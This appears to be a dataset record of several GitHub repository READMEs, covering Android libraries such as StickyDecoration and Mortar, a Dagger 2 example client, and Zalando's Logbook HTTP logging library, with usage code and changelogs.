    distributed under the License is distributed on an "AS IS" BASIS,
    WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
    See the License for the specific language governing permissions and
    limitations under the License.
0
Gavin-ZYX/StickyDecoration
null
null
# StickyDecoration
A sticky group-header effect implemented with `RecyclerView.ItemDecoration`.

![Effect](http://upload-images.jianshu.io/upload_images/1638147-89986d7141741cdf.gif?imageMogr2/auto-orient/strip)

## Supports
- **LinearLayoutManager**
- **GridLayoutManager**
- **Click events**
- **Dividers**

## Dependency
Project requirement: `minSdkVersion` >= 14.

In your `build.gradle`:
```gradle
repositories {
    maven { url 'https://jitpack.io' }
}

dependencies {
    compile 'com.github.Gavin-ZYX:StickyDecoration:1.6.1'
}
```
**Latest version** [![](https://jitpack.io/v/Gavin-ZYX/StickyDecoration.svg)](https://jitpack.io/#Gavin-ZYX/StickyDecoration)

## Usage

#### Text header: StickyDecoration

> **Note** recyclerView.setLayoutManager() must be called before recyclerView.addItemDecoration();

Code:
```java
GroupListener groupListener = new GroupListener() {
    @Override
    public String getGroupName(int position) {
        // get the group name
        return mList.get(position).getProvince();
    }
};
StickyDecoration decoration = StickyDecoration.Builder
        .init(groupListener)
        // reset the span (must be called when using GridLayoutManager)
        //.resetSpan(mRecyclerView, (GridLayoutManager) manager)
        .build();
...
mRecyclerView.setLayoutManager(manager);
// addItemDecoration() must be called after setLayoutManager()
mRecyclerView.addItemDecoration(decoration);
```
Result:

![LinearLayoutManager](http://upload-images.jianshu.io/upload_images/1638147-f3c2cbe712aa65fb.gif?imageMogr2/auto-orient/strip)
![GridLayoutManager](http://upload-images.jianshu.io/upload_images/1638147-e5e0374c896110d0.gif?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)

**Supported methods:**

| Method | Function | Default |
|-|-|-|
| setGroupBackground | Background color | #48BDFF |
| setGroupHeight | Height | 120px |
| setGroupTextColor | Text color | Color.WHITE |
| setGroupTextSize | Text size | 50px |
| setDivideColor | Divider color | #CCCCCC |
| setDivideHeight | Divider height | 0 |
| setTextSideMargin | Margin (left margin when aligned left, right margin when aligned right) | 10 |
| setHeaderCount | Number of header items (LinearLayoutManager only) | 0 |
| setSticky | Whether to stick the header to the top | true |

| Method | Function | Description |
|-|-|-|
| setOnClickListener | Click event | Sets a click listener; returns the position of the first item in the current group |
| resetSpan | Reset the span | Must be called when using GridLayoutManager |

### Custom View header: PowerfulStickyDecoration

First create the layout `item_group`:
```xml
<?xml version="1.0" encoding="utf-8"?>
<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
    android:id="@+id/ll"
    android:orientation="horizontal"
    ...>

    <ImageView
        android:id="@+id/iv"
        .../>

    <TextView
        android:id="@+id/tv"
        .../>
</LinearLayout>
```
Create a `PowerfulStickyDecoration` to get a custom sticky `View`:
```java
PowerGroupListener listener = new PowerGroupListener() {
    @Override
    public String getGroupName(int position) {
        return mList.get(position).getProvince();
    }

    @Override
    public View getGroupView(int position) {
        // get the custom group view
        View view = getLayoutInflater().inflate(R.layout.item_group, null, false);
        ((TextView) view.findViewById(R.id.tv)).setText(mList.get(position).getProvince());
        return view;
    }
};

PowerfulStickyDecoration decoration = PowerfulStickyDecoration.Builder
        .init(listener)
        // reset the span (note: must be called when using GridLayoutManager)
        //.resetSpan(mRecyclerView, (GridLayoutManager) manager)
        .build();
...
mRecyclerView.addItemDecoration(decoration);
```
Result:

![Effect](http://upload-images.jianshu.io/upload_images/1638147-3fed255296a6c3db.gif?imageMogr2/auto-orient/strip)

**Supported methods:**

| Method | Function | Default |
| -- | -- | -- |
| setGroupHeight | Height | 120px |
| setGroupBackground | Background color | #48BDFF |
| setDivideColor | Divider color | #CCCCCC |
| setDivideHeight | Divider height | 0 |
| setCacheEnable | Whether to use the cache | Cache enabled |
| setHeaderCount | Number of header items (LinearLayoutManager only) | 0 |
| setSticky | Whether to stick the header to the top | true |

| Method | Function | Description |
|-|-|-|
| setOnClickListener | Click event | Sets a click listener; returns the position of the first item in the current group and the id of the clicked view |
| resetSpan | Reset the span | Must be called when using GridLayoutManager |
| notifyRedraw | Trigger a redraw | Use case: call it after a network image has finished loading |
| clearCache | Clear the cache | When caching is enabled and the data changes, the cache needs to be cleared |

**Tips**

1. When using network images, call the following after the image has finished loading:
```java
decoration.notifyRedraw(mRv, view, position);
```
2. When caching is enabled and the data source changes, call clearCache to clear the cached data.
3. For the click-through issue on the sticky header, see MyRecyclerView in the demo. [issue47](https://github.com/Gavin-ZYX/StickyDecoration/issues/37)

# Changelog

----------------------------- 1.6.0 (2022-8-21)----------------------------
- fix: disabling the cache had no effect
- repository migrated
- migrated to AndroidX

----------------------------- 1.5.3 (2020-12-15)----------------------------
- support toggling the sticky effect

----------------------------- 1.5.2 (2019-9-3)----------------------------
- fix: poor sticky behavior in special cases

----------------------------- 1.5.1 (2019-8-8)----------------------------
- fix: layout disorder caused by setHeaderCount

----------------------------- 1.5.0 (2019-6-17)----------------------------
- fix: data disorder after refreshing with GridLayoutManager

----------------------------- 1.4.12 (2019-5-8)----------------------------
- fix: setDivideColor not taking effect

----------------------------- 1.4.9 (2018-10-9)----------------------------
- fix: several issues caused by adding a header

----------------------------- 1.4.8 (2018-08-26)----------------------------
- provided a workaround for click-through on the sticky header

----------------------------- 1.4.7 (2018-08-16)----------------------------
- fix: layout not refreshed after data changes

----------------------------- 1.4.6 (2018-07-29)----------------------------
- changed the caching approach
- added performance monitoring

----------------------------- 1.4.5 (2018-06-17)----------------------------
- fixed layout disorder when using setHeaderCount with GridLayoutManager

----------------------------- 1.4.4 (2018-06-2)----------------------------
- added the setHeaderCount method
- updated the README
- bug fixes

----------------------------- 1.4.3 (2018-05-27)----------------------------
- fixed some bugs and renamed some members

----------------------------- 1.4.2 (2018-04-2)----------------------------
- enhanced click events: clicks on views inside the sticky header can now be received (View.NO_ID is returned when no id is set)
- fixed a crash (or an extra sticky item) when load-more returns null, for the load-more-as-an-item approach

----------------------------- 1.4.1 (2018-03-21)----------------------------
- cache disabled by default, to avoid display issues when the data changes
- added the clearCache method for clearing the cache

----------------------------- 1.4.0 (2018-03-04)----------------------------
- support redrawing after asynchronous loading (e.g. network images)
- optimized the cache
- optimized the GridLayoutManager divider

----------------------------- 1.3.1 (2018-01-30)----------------------------
- changed the measurement approach

----------------------------- 1.3.0 (2018-01-28)----------------------------
- removed the isAlignLeft() method; when right alignment is needed, just handle it in the layout
- optimized the caching mechanism
0
square/mortar
A simple library that makes it easy to pair thin views with dedicated controllers, isolated from most of the vagaries of the Activity life cycle.
null
# Mortar ## Deprecated Mortar had a good run and served us well, but new use is strongly discouraged. The app suite at Square that drove its creation is in the process of replacing Mortar with [Square Workflow](https://square.github.io/workflow/). ## What's a Mortar? Mortar provides a simplified, composable overlay for the Android lifecycle, to aid in the use of [Views as the modular unit of Android applications][rant]. It leverages [Context#getSystemService][services] to act as an a la carte supplier of services like dependency injection, bundle persistence, and whatever else your app needs to provide itself. One of the most useful services Mortar can provide is its [BundleService][bundle-service], which gives any View (or any object with access to the Activity context) safe access to the Activity lifecycle's persistence bundle. For fans of the [Model View Presenter][mvp] pattern, we provide a persisted [Presenter][presenter] class that builds on BundleService. Presenters are completely isolated from View concerns. They're particularly good at surviving configuration changes, weathering the storm as Android destroys your portrait Activity and Views and replaces them with landscape doppelgangers. Mortar can similarly make [Dagger][dagger] ObjectGraphs (or [Dagger2][dagger2] Components) visible as system services. Or not &mdash; these services are completely decoupled. Everything is managed by [MortarScope][scope] singletons, typically backing the top level Application and Activity contexts. You can also spawn your own shorter lived scopes to manage transient sessions, like the state of an object being built by a set of wizard screens. <!-- This example is a little bit confusing. Maybe explain why you would want to have an extended graph for a wizard, then explain how Mortar shadows the parent graph with that extended graph. --> These nested scopes can shadow the services provided by higher level scopes. For example, a [Dagger extension graph][ogplus] specific to your wizard session can cover the one normally available, transparently to the wizard Views. Calls like `ObjectGraphService.inject(getContext(), this)` are now possible without considering which graph will do the injection. ## The Big Picture An application will typically have a singleton MortarScope instance. Its job is to serve as a delegate to the app's `getSystemService` method, something like: ```java public class MyApplication extends Application { private MortarScope rootScope; @Override public Object getSystemService(String name) { if (rootScope == null) rootScope = MortarScope.buildRootScope().build(getScopeName()); return rootScope.hasService(name) ? rootScope.getService(name) : super.getSystemService(name); } } ``` This exposes a single, core service, the scope itself. From the scope you can spawn child scopes, and you can register objects that implement the [Scoped](https://github.com/square/mortar/blob/master/mortar/src/main/java/mortar/Scoped.java#L18) interface with it for setup and tear-down calls. * `Scoped#onEnterScope(MortarScope)` * `Scoped#onExitScope(MortarScope)` To make a scope provide other services, like a [Dagger ObjectGraph][og], you register them while building the scope. 
That would make our Application's `getSystemService` method look like this:

```java
@Override public Object getSystemService(String name) {
  if (rootScope == null) {
    rootScope = MortarScope.buildRootScope()
        .with(ObjectGraphService.SERVICE_NAME, ObjectGraph.create(new RootModule()))
        .build(getScopeName());
  }

  return rootScope.hasService(name) ? rootScope.getService(name) : super.getSystemService(name);
}
```

Now any part of our app that has access to a `Context` can inject itself:

```java
public class MyView extends LinearLayout {
  @Inject SomeService service;

  public MyView(Context context, AttributeSet attrs) {
    super(context, attrs);
    ObjectGraphService.inject(context, this);
  }
}
```

To take advantage of the BundleService described above, you'll put similar code into your Activity. If it doesn't exist already, you'll build a sub-scope to back the Activity's `getSystemService` method, and while building it set up the `BundleServiceRunner`. You'll also notify the BundleServiceRunner each time `onCreate` and `onSaveInstanceState` are called, to make the persistence bundle available to the rest of the app.

```java
public class MyActivity extends Activity {
  private MortarScope activityScope;

  @Override public Object getSystemService(String name) {
    MortarScope activityScope = MortarScope.findChild(getApplicationContext(), getScopeName());

    if (activityScope == null) {
      activityScope = MortarScope.buildChild(getApplicationContext())
          .withService(BundleServiceRunner.SERVICE_NAME, new BundleServiceRunner())
          .withService(HelloPresenter.class.getName(), new HelloPresenter())
          .build(getScopeName());
    }

    return activityScope.hasService(name) ? activityScope.getService(name)
        : super.getSystemService(name);
  }

  @Override protected void onCreate(Bundle savedInstanceState) {
    super.onCreate(savedInstanceState);
    BundleServiceRunner.getBundleServiceRunner(this).onCreate(savedInstanceState);
    setContentView(R.layout.main_view);
  }

  @Override protected void onSaveInstanceState(Bundle outState) {
    super.onSaveInstanceState(outState);
    BundleServiceRunner.getBundleServiceRunner(this).onSaveInstanceState(outState);
  }
}
```

With that in place, any object in your app can sign up with the `BundleService` to save and restore its state. This is nice for views, since Bundles are less of a hassle than the `Parcelable` objects required by `View#onSaveInstanceState`, and a boon to any business objects in the rest of your app.

Download
--------

Download [the latest JAR][jar] or grab via Maven:
```xml
<dependency>
    <groupId>com.squareup.mortar</groupId>
    <artifactId>mortar</artifactId>
    <version>(insert latest version)</version>
</dependency>
```

Gradle:
```groovy
compile 'com.squareup.mortar:mortar:(latest version)'
```

## Full Disclosure

This stuff has been in "rapid" development over a pretty long gestation period, but is finally stabilizing. We don't expect drastic changes before cutting a 1.0 release, but we still cannot promise a stable API from release to release.

Mortar is a key component of multiple Square apps, including our flagship [Square Register][register] app.

License
--------

    Copyright 2013 Square, Inc.

    Licensed under the Apache License, Version 2.0 (the "License");
    you may not use this file except in compliance with the License.
    You may obtain a copy of the License at

       http://www.apache.org/licenses/LICENSE-2.0

    Unless required by applicable law or agreed to in writing, software
    distributed under the License is distributed on an "AS IS" BASIS,
    WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and limitations under the License. [bundle-service]: https://github.com/square/mortar/blob/master/mortar/src/main/java/mortar/bundler/BundleService.java [mvp]: http://en.wikipedia.org/wiki/Model%E2%80%93view%E2%80%93presenter [dagger]: http://square.github.io/dagger/ [dagger2]: http://google.github.io/dagger/ [jar]: http://repository.sonatype.org/service/local/artifact/maven/redirect?r=central-proxy&g=com.squareup.mortar&a=mortar&v=LATEST [og]: https://square.github.io/dagger/1.x/dagger/dagger/ObjectGraph.html [ogplus]: https://github.com/square/dagger/blob/dagger-parent-1.1.0/core/src/main/java/dagger/ObjectGraph.java#L96 [presenter]: https://github.com/square/mortar/blob/master/mortar/src/main/java/mortar/Presenter.java [rant]: http://corner.squareup.com/2014/10/advocating-against-android-fragments.html [register]: https://play.google.com/store/apps/details?id=com.squareup [scope]: https://github.com/square/mortar/blob/master/mortar/src/main/java/mortar/MortarScope.java [services]: http://developer.android.com/reference/android/content/Context.html#getSystemService(java.lang.String)
0
joyoyao/superCleanMaster
[DEPRECATED]
null
# superCleanMaster superCleanMaster is deprecated Thanks for all your support!
0
frogermcs/GithubClient
Example of Github API client implemented on top of Dagger 2 DI framework.
null
# GithubClient
Example of a Github API client implemented on top of the Dagger 2 DI framework.

This code was created as an example for the Dependency Injection with Dagger 2 series on my dev-blog:
- [Introduction to Dependency Injection](http://frogermcs.github.io/dependency-injection-with-dagger-2-introdution-to-di/)
- [Dagger 2 API](http://frogermcs.github.io/dependency-injection-with-dagger-2-the-api/)
- [Dagger 2 - custom scopes](http://frogermcs.github.io/dependency-injection-with-dagger-2-custom-scopes/)
- [Dagger 2 - graph creation performance](http://frogermcs.github.io/dagger-graph-creation-performance/)
- [Dependency injection with Dagger 2 - Producers](http://frogermcs.github.io/dependency-injection-with-dagger-2-producers/)
- [Inject everything - ViewHolder and Dagger 2 (with Multibinding and AutoFactory example)](http://frogermcs.github.io/inject-everything-viewholder-and-dagger-2-example/)

This code was originally prepared for my presentation at Google I/O Extended 2015 in Tech Space Cracow. http://www.meetup.com/GDG-Krakow/events/221822600/
1
sirthias/pegdown
A pure-Java Markdown processor based on a parboiled PEG parser supporting a number of extensions
null
null
0
zalando/logbook
An extensible Java library for HTTP request and response logging
client-side http-logs java logbook logger logging logs monitoring observability plugin-extension request-response server-side spring-boot spring-boot-starter
# Logbook: HTTP request and response logging

[![Logbook](docs/logbook.jpg)](#attributions)

[![Stability: Active](https://masterminds.github.io/stability/active.svg)](https://masterminds.github.io/stability/active.html)
![Build Status](https://github.com/zalando/logbook/workflows/build/badge.svg)
[![Coverage Status](https://img.shields.io/coveralls/zalando/logbook/main.svg)](https://coveralls.io/r/zalando/logbook)
[![Javadoc](http://javadoc.io/badge/org.zalando/logbook-core.svg)](http://www.javadoc.io/doc/org.zalando/logbook-core)
[![Release](https://img.shields.io/github/release/zalando/logbook.svg)](https://github.com/zalando/logbook/releases)
[![Maven Central](https://img.shields.io/maven-central/v/org.zalando/logbook-parent.svg)](https://maven-badges.herokuapp.com/maven-central/org.zalando/logbook-parent)
[![License](https://img.shields.io/badge/license-MIT-blue.svg)](https://raw.githubusercontent.com/zalando/logbook/main/LICENSE)
[![Project Map](https://sourcespy.com/shield.svg)](https://sourcespy.com/github/zalandologbook/)

> **Logbook** noun, /lɑɡ bʊk/: A book in which measurements from the ship's log are recorded, along with other salient details of the voyage.

**Logbook** is an extensible Java library to enable complete request and response logging for different client- and server-side technologies. It satisfies a special need by a) allowing web application developers to log any HTTP traffic that an application receives or sends b) in a way that makes it easy to persist and analyze it later. This can be useful for traditional log analysis, meeting audit requirements or investigating individual historic traffic issues.

Logbook is ready to use out of the box for most common setups. Even for uncommon applications and technologies, it should be simple to implement the necessary interfaces to connect a library/framework/etc. to it.

## Features

- **Logging**: of HTTP requests and responses, including the body; partial logging (no body) for unauthorized requests
- **Customization**: of the logging format, the logging destination, and the conditions that determine which requests to log
- **Support**: for Servlet containers, Apache’s HTTP client, Square's OkHttp, and (via its elegant API) other frameworks
- Optional obfuscation of sensitive data
- [Spring Boot](http://projects.spring.io/spring-boot/) Auto Configuration
- [Scalyr](docs/scalyr.md) compatible
- Sensible defaults

## Dependencies

- Java 8 (for Spring 6 / Spring Boot 3 and JAX-RS 3.x, Java 17 is required)
- Any build tool using Maven Central, or direct download
- Servlet Container (optional)
- Apache HTTP Client 4.x **or 5.x** (optional)
- JAX-RS 3.x (aka Jakarta RESTful Web Services) Client and Server (optional)
- JAX-RS 2.x Client and Server (optional)
- Netty 4.x (optional)
- OkHttp 2.x **or 3.x** (optional)
- Spring **6.x** or Spring 5.x (optional, see instructions below)
- Spring Boot **3.x** or 2.x (optional)
- Ktor (optional)
- logstash-logback-encoder 5.x (optional)

## Installation

Add the following dependency to your project:

```xml
<dependency>
    <groupId>org.zalando</groupId>
    <artifactId>logbook-core</artifactId>
    <version>${logbook.version}</version>
</dependency>
```

### Spring 5 / Spring Boot 2 Support

For Spring 5 / Spring Boot 2 backwards compatibility please add the following import:

```xml
<dependency>
    <groupId>org.zalando</groupId>
    <artifactId>logbook-servlet</artifactId>
    <version>${logbook.version}</version>
    <classifier>javax</classifier>
</dependency>
```

Additional modules/artifacts of Logbook always share the same version number.
Alternatively, you can import our *bill of materials*...

```xml
<dependencyManagement>
  <dependencies>
    <dependency>
      <groupId>org.zalando</groupId>
      <artifactId>logbook-bom</artifactId>
      <version>${logbook.version}</version>
      <type>pom</type>
      <scope>import</scope>
    </dependency>
  </dependencies>
</dependencyManagement>
```

<details>
  <summary>... which allows you to omit versions:</summary>

```xml
<dependency>
  <groupId>org.zalando</groupId>
  <artifactId>logbook-core</artifactId>
</dependency>
<dependency>
  <groupId>org.zalando</groupId>
  <artifactId>logbook-httpclient</artifactId>
</dependency>
<dependency>
  <groupId>org.zalando</groupId>
  <artifactId>logbook-jaxrs</artifactId>
</dependency>
<dependency>
  <groupId>org.zalando</groupId>
  <artifactId>logbook-json</artifactId>
</dependency>
<dependency>
  <groupId>org.zalando</groupId>
  <artifactId>logbook-netty</artifactId>
</dependency>
<dependency>
  <groupId>org.zalando</groupId>
  <artifactId>logbook-okhttp</artifactId>
</dependency>
<dependency>
  <groupId>org.zalando</groupId>
  <artifactId>logbook-okhttp2</artifactId>
</dependency>
<dependency>
  <groupId>org.zalando</groupId>
  <artifactId>logbook-servlet</artifactId>
</dependency>
<dependency>
  <groupId>org.zalando</groupId>
  <artifactId>logbook-spring-boot-starter</artifactId>
</dependency>
<dependency>
  <groupId>org.zalando</groupId>
  <artifactId>logbook-ktor-common</artifactId>
</dependency>
<dependency>
  <groupId>org.zalando</groupId>
  <artifactId>logbook-ktor-client</artifactId>
</dependency>
<dependency>
  <groupId>org.zalando</groupId>
  <artifactId>logbook-ktor-server</artifactId>
</dependency>
<dependency>
  <groupId>org.zalando</groupId>
  <artifactId>logbook-ktor</artifactId>
</dependency>
<dependency>
  <groupId>org.zalando</groupId>
  <artifactId>logbook-logstash</artifactId>
</dependency>
```

</details>

The logbook logger must be configured to trace level in order to log the requests and responses. With Spring Boot 2 (using Logback) this can be accomplished by adding the following line to your `application.properties`

```
logging.level.org.zalando.logbook: TRACE
```

## Usage

All integrations require an instance of `Logbook` which holds all configuration and wires all necessary parts together. You can either create one using all the defaults:

```java
Logbook logbook = Logbook.create();
```

or create a customized version using the `LogbookBuilder`:

```java
Logbook logbook = Logbook.builder()
    .condition(new CustomCondition())
    .queryFilter(new CustomQueryFilter())
    .pathFilter(new CustomPathFilter())
    .headerFilter(new CustomHeaderFilter())
    .bodyFilter(new CustomBodyFilter())
    .requestFilter(new CustomRequestFilter())
    .responseFilter(new CustomResponseFilter())
    .sink(new DefaultSink(
        new CustomHttpLogFormatter(),
        new CustomHttpLogWriter()
    ))
    .build();
```

### Strategy

Logbook used to have a very rigid strategy for how to do request/response logging:

- Requests/responses are logged separately
- Requests/responses are logged as soon as possible
- Requests/responses are logged as a pair or not logged at all (i.e. no partial logging of traffic)

Some of those restrictions could be mitigated with custom [`HttpLogWriter`](#writing) implementations, but they were never ideal.

Starting with version 2.0, Logbook comes with a [Strategy pattern](https://en.wikipedia.org/wiki/Strategy_pattern) at its core. Make sure you read the documentation of the [`Strategy`](logbook-api/src/main/java/org/zalando/logbook/Strategy.java) interface to understand the implications.
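As a rough illustration, a custom strategy that logs requests as usual but only logs responses indicating a server error could look like the following sketch (hedged: the class name and status threshold are made up, and it relies on the interface's default methods for everything not overridden; it is not one of the shipped strategies):

```java
import java.io.IOException;
import org.zalando.logbook.Correlation;
import org.zalando.logbook.HttpRequest;
import org.zalando.logbook.HttpResponse;
import org.zalando.logbook.Sink;
import org.zalando.logbook.Strategy;

// Sketch: suppress response logging unless the status signals a server error.
final class ServerErrorOnlyStrategy implements Strategy {

    @Override
    public void write(final Correlation correlation, final HttpRequest request,
            final HttpResponse response, final Sink sink) throws IOException {
        if (response.getStatus() >= 500) {
            sink.write(correlation, request, response);
        }
    }
}
```

Such a strategy would then be registered via `Logbook.builder().strategy(new ServerErrorOnlyStrategy()).build()`.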
Logbook comes with some built-in strategies:

- [`BodyOnlyIfStatusAtLeastStrategy`](logbook-core/src/main/java/org/zalando/logbook/core/BodyOnlyIfStatusAtLeastStrategy.java)
- [`StatusAtLeastStrategy`](logbook-core/src/main/java/org/zalando/logbook/core/StatusAtLeastStrategy.java)
- [`WithoutBodyStrategy`](logbook-core/src/main/java/org/zalando/logbook/core/WithoutBodyStrategy.java)

### Attribute Extractor

Starting with version 3.4.0, Logbook is equipped with a feature called *Attribute Extractor*. Attributes are basically a list of key/value pairs that can be extracted from the request and/or response, and logged with them. The idea was sprouted from [issue 381](https://github.com/zalando/logbook/issues/381), where a feature was requested to extract the subject claim from JWT tokens in the authorization header.

The `AttributeExtractor` interface has two `extract` methods: one that can extract attributes from the request only, and one that has both the request and the response at its disposal. Both return an instance of the `HttpAttributes` class, which is basically a fancy `Map<String, Object>`. Notice that since the map values are of type `Object`, they should have a proper `toString()` method in order for them to appear in the logs in a meaningful way. Alternatively, log formatters can work around this by implementing their own serialization logic. For instance, the built-in log formatter `JsonHttpLogFormatter` uses `ObjectMapper` to serialize the values.

Here is an example:

```java
final class OriginExtractor implements AttributeExtractor {
    @Override
    public HttpAttributes extract(final HttpRequest request) {
        return HttpAttributes.of("origin", request.getOrigin());
    }
}
```

Logbook must then be created by registering this attribute extractor:

```java
final Logbook logbook = Logbook.builder()
    .attributeExtractor(new OriginExtractor())
    .build();
```

This will result in request logs that include something like:

```text
"attributes":{"origin":"LOCAL"}
```

For more advanced examples, look at the `JwtFirstMatchingClaimExtractor` and `JwtAllMatchingClaimsExtractor` classes. The former extracts the first claim matching a list of claim names from the request JWT token. The latter extracts all claims matching a list of claim names from the request JWT token.

If you need to incorporate multiple `AttributeExtractor`s, you can use the class `CompositeAttributeExtractor`:

```java
final List<AttributeExtractor> extractors = List.of(
    extractor1,
    extractor2,
    extractor3
);

final Logbook logbook = Logbook.builder()
    .attributeExtractor(new CompositeAttributeExtractor(extractors))
    .build();
```

### Phases

Logbook works in several different phases:

1. [Conditional](#conditional),
2. [Filtering](#filtering),
3. [Formatting](#formatting) and
4. [Writing](#writing)

Each phase is represented by one or more interfaces that can be used for customization. Every phase has a sensible default.

#### Conditional

Logging HTTP messages and including their bodies is a rather expensive task, so it makes a lot of sense to disable logging for certain requests. A common use case would be to ignore *health check* requests from a load balancer, or any request to management endpoints typically issued by developers.

Defining a condition is as easy as writing a special `Predicate` that decides whether a request (and its corresponding response) should be logged or not.
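For example, a minimal hand-written condition (a sketch; the health-check path is an assumption):

```java
import java.util.function.Predicate;
import org.zalando.logbook.HttpRequest;
import org.zalando.logbook.Logbook;

// Sketch: skip logging for load-balancer health checks (path is an assumption).
Predicate<HttpRequest> notHealthCheck = request -> !"/health".equals(request.getPath());

Logbook logbook = Logbook.builder()
        .condition(notHealthCheck)
        .build();
```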
Alternatively you can use and combine predefined predicates:

```java
Logbook logbook = Logbook.builder()
    .condition(exclude(
        requestTo("/health"),
        requestTo("/admin/**"),
        contentType("application/octet-stream"),
        header("X-Secret", newHashSet("1", "true")::contains)))
    .build();
```

Exclusion patterns, e.g. `/admin/**`, loosely follow [Ant's style of path patterns](https://ant.apache.org/manual/dirtasks.html#patterns) without taking the query string of the URL into consideration.

#### Filtering

The goal of *Filtering* is to prevent the logging of certain sensitive parts of HTTP requests and responses. This usually includes the *Authorization* header, but could also apply to certain plaintext query or form parameters — e.g. *password*.

Logbook supports different types of filters:

| Type             | Operates on                    | Applies to | Default                                                                            |
|------------------|--------------------------------|------------|------------------------------------------------------------------------------------|
| `QueryFilter`    | Query string                   | request    | `access_token`                                                                     |
| `PathFilter`     | Path                           | request    | n/a                                                                                |
| `HeaderFilter`   | Header (single key-value pair) | both       | `Authorization`                                                                    |
| `BodyFilter`     | Content-Type and body          | both       | json: `access_token` and `refresh_token`<br> form: `client_secret` and `password` |
| `RequestFilter`  | `HttpRequest`                  | request    | Replace binary, multipart and stream bodies.                                       |
| `ResponseFilter` | `HttpResponse`                 | response   | Replace binary, multipart and stream bodies.                                       |

`QueryFilter`, `PathFilter`, `HeaderFilter` and `BodyFilter` are relatively high-level and should cover all needs in ~90% of all cases. For more complicated setups one should fall back to the low-level variants, i.e. `RequestFilter` and `ResponseFilter` respectively (in conjunction with `ForwardingHttpRequest`/`ForwardingHttpResponse`).

You can configure filters like this:

```java
import static org.zalando.logbook.core.HeaderFilters.authorization;
import static org.zalando.logbook.core.HeaderFilters.eachHeader;
import static org.zalando.logbook.core.QueryFilters.accessToken;
import static org.zalando.logbook.core.QueryFilters.replaceQuery;

Logbook logbook = Logbook.builder()
    .requestFilter(RequestFilters.replaceBody(message -> contentType("audio/*").test(message) ? "mmh mmh mmh mmh" : null))
    .responseFilter(ResponseFilters.replaceBody(message -> contentType("*/*-stream").test(message) ? "It just keeps going and going..." : null))
    .queryFilter(accessToken())
    .queryFilter(replaceQuery("password", "<secret>"))
    .headerFilter(authorization())
    .headerFilter(eachHeader("X-Secret"::equalsIgnoreCase, "<secret>"))
    .build();
```

You can configure as many filters as you want - they will run consecutively.

##### JsonPath body filtering (experimental)

You can apply [JSON Path](https://github.com/json-path/JsonPath) filtering to JSON bodies.
Here are some examples:

```java
import static org.zalando.logbook.json.JsonPathBodyFilters.jsonPath;
import static java.util.regex.Pattern.compile;

Logbook logbook = Logbook.builder()
    .bodyFilter(jsonPath("$.password").delete())
    .bodyFilter(jsonPath("$.active").replace("unknown"))
    .bodyFilter(jsonPath("$.address").replace("X"))
    .bodyFilter(jsonPath("$.name").replace(compile("^(\\w).+"), "$1."))
    .bodyFilter(jsonPath("$.friends.*.name").replace(compile("^(\\w).+"), "$1."))
    .bodyFilter(jsonPath("$.grades.*").replace(1.0))
    .build();
```

Take a look at the following example, before and after filtering was applied:

<details>
  <summary>Before</summary>

```json
{
  "id": 1,
  "name": "Alice",
  "password": "s3cr3t",
  "active": true,
  "address": "Anhalter Straße 17 13, 67278 Bockenheim an der Weinstraße",
  "friends": [
    {
      "id": 2,
      "name": "Bob"
    },
    {
      "id": 3,
      "name": "Charlie"
    }
  ],
  "grades": {
    "Math": 1.0,
    "English": 2.2,
    "Science": 1.9,
    "PE": 4.0
  }
}
```

</details>

<details>
  <summary>After</summary>

```json
{
  "id": 1,
  "name": "A.",
  "active": "unknown",
  "address": "XXX",
  "friends": [
    {
      "id": 2,
      "name": "B."
    },
    {
      "id": 3,
      "name": "C."
    }
  ],
  "grades": {
    "Math": 1.0,
    "English": 1.0,
    "Science": 1.0,
    "PE": 1.0
  }
}
```

</details>

#### Correlation

Logbook uses a *correlation id* to correlate requests and responses. This makes it possible to match related requests and responses that would usually be located in different places in the log file.

If the default implementation of the correlation id is insufficient for your use case, you may provide a custom implementation:

```java
Logbook logbook = Logbook.builder()
    .correlationId(new CustomCorrelationId())
    .build();
```

#### Formatting

*Formatting* defines how requests and responses are transformed into strings. Formatters do **not** specify where requests and responses are logged to — writers do that work.

Logbook comes with two different default formatters: *HTTP* and *JSON*.

##### HTTP

*HTTP* is the default formatting style, provided by the `DefaultHttpLogFormatter`. It is primarily designed to be used for local development and debugging, not for production use. This is because it’s not as readily machine-readable as JSON.

###### Request

```http
Incoming Request: 2d66e4bc-9a0d-11e5-a84c-1f39510f0d6b
GET http://example.org/test HTTP/1.1
Accept: application/json
Host: localhost
Content-Type: text/plain

Hello world!
```

###### Response

```http
Outgoing Response: 2d66e4bc-9a0d-11e5-a84c-1f39510f0d6b
Duration: 25 ms
HTTP/1.1 200
Content-Type: application/json

{"value":"Hello world!"}
```

##### JSON

*JSON* is an alternative formatting style, provided by the `JsonHttpLogFormatter`. Unlike HTTP, it is primarily designed for production use — parsers and log consumers can easily consume it.

Requires the following dependency:

```xml
<dependency>
    <groupId>org.zalando</groupId>
    <artifactId>logbook-json</artifactId>
</dependency>
```

###### Request

```json
{
  "origin": "remote",
  "type": "request",
  "correlation": "2d66e4bc-9a0d-11e5-a84c-1f39510f0d6b",
  "protocol": "HTTP/1.1",
  "sender": "127.0.0.1",
  "method": "GET",
  "uri": "http://example.org/test",
  "host": "example.org",
  "path": "/test",
  "scheme": "http",
  "port": null,
  "headers": {
    "Accept": ["application/json"],
    "Content-Type": ["text/plain"]
  },
  "body": "Hello world!"
}
```

###### Response

```json
{
  "origin": "local",
  "type": "response",
  "correlation": "2d66e4bc-9a0d-11e5-a84c-1f39510f0d6b",
  "duration": 25,
  "protocol": "HTTP/1.1",
  "status": 200,
  "headers": {
    "Content-Type": ["text/plain"]
  },
  "body": "Hello world!"
}
```

Note: Bodies of type `application/json` (and `application/*+json`) will be *inlined* into the resulting JSON tree. I.e., a JSON response body will **not** be escaped and represented as a string:

```json
{
  "origin": "local",
  "type": "response",
  "correlation": "2d66e4bc-9a0d-11e5-a84c-1f39510f0d6b",
  "duration": 25,
  "protocol": "HTTP/1.1",
  "status": 200,
  "headers": {
    "Content-Type": ["application/json"]
  },
  "body": {
    "greeting": "Hello, world!"
  }
}
```

##### Common Log Format

The Common Log Format ([CLF](https://httpd.apache.org/docs/trunk/logs.html#common)) is a standardized text file format used by web servers when generating server log files. The format is supported via the `CommonsLogFormatSink`:

```text
185.85.220.253 - - [02/Aug/2019:08:16:41 +0000] "GET /search?q=zalando HTTP/1.1" 200 -
```

##### Extended Log Format

